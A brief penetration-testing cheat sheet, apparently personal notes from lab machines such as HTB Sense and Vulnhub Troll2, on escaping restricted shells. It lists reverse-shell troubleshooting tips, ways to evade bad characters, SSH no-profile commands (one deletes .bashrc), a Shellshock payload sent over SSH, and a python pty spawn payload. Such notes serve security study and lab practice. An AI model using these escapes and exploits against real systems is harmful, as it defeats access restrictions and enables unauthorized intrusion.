Restricted Shell / SSH by kidnapshadow


Restricted Shell / SSH

If reverse shell not working :
  • try changing the port to 443 or 80
  • try checking for characters breaking the reverse shell
Evading Badchars in a reverse shell (HTB Sense)
  • Echo abc
  • Echo abc/
  • Echo abc -
  • Check env variables -> env
  • HOME= /
  • Echo ${HOME}/home
  • Optional (Using ASCII to evade badchars)
  • Printf “\55” -> -
Restricted Reverse Shell :
  • To disable profiling in /etc/profile and ~/.profile
  • Locate ifconfig
  • /sbin/ifconfig
  • nice /bin/bash
// Ways to no profile
ssh hostname -t "bash --noprofile"
ssh -t user@host bash --norc --noprofile
ssh -t username@hostname /bin/sh
ssh -t user@host "bash --norc --noprofile -c '/bin/rm .bashrc'"
// SSH bash shellshock (Troll2 Vulnhub)
ssh -i noob noob@ '() { :; }; uname -a'
Bypass restricted shell using : (dipak.pdf)
  • export PATH=/bin/:sbin/:/usr/bin/:$PATH
  • payload = "python -c 'import pty;pty.spawn(\"/bin/bash\")'"

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